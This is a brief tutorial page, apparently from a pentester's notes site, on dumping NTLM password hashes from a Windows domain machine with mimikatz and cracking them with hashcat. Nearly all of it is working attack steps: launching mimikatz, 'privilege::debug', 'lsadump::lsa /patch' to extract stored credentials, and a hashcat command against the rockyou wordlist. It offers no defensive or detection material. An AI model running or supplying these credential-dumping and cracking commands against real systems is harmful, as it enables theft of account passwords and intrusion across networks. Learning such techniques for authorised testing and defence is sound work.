# Dumping Hashes with mimikatz

### Introduction

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network

We'll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat

***

### Dump Hashes w/ mimikatz

1. `cd Downloads` && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary 
   \*

   ```
   <figure><img src="https://1920086362-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDfv51K0WXLZdwTryHQZc%2Fuploads%2FujYoRyIt51A1WdtN73lu%2Fimage.png?alt=media&#x26;token=27063bac-8564-4818-8e33-fea16a2b1c7c" alt=""><figcaption></figcaption></figure>
   ```
2. `privilege::debug` ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly&#x20;
   \*

   ```
   <figure><img src="https://1920086362-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDfv51K0WXLZdwTryHQZc%2Fuploads%2FUsDkjbc8hTGqpMgMoEDS%2Fimage.png?alt=media&#x26;token=6430c23e-c27c-4621-8de3-81f4e3932c76" alt=""><figcaption></figcaption></figure>
   ```
3. `lsadump::lsa /patch` Dump those hashes!&#x20;
   \*

   ```
   <figure><img src="https://1920086362-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDfv51K0WXLZdwTryHQZc%2Fuploads%2F0W2pLHidixw44c3KH708%2Fimage.png?alt=media&#x26;token=0e205237-b586-4cf9-951d-6a002a648118" alt=""><figcaption></figcaption></figure>
   ```

***

### Crack those hashes w/ hashcat

1. `hashcat -m 1000 <hash> rockyou.txt`&#x20;

<figure><img src="https://1920086362-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDfv51K0WXLZdwTryHQZc%2Fuploads%2FvjJXgN6cAkc22uihVd6S%2Fimage.png?alt=media&#x26;token=11c6c06e-6456-4754-b3bb-e43685188f3c" alt=""><figcaption></figcaption></figure>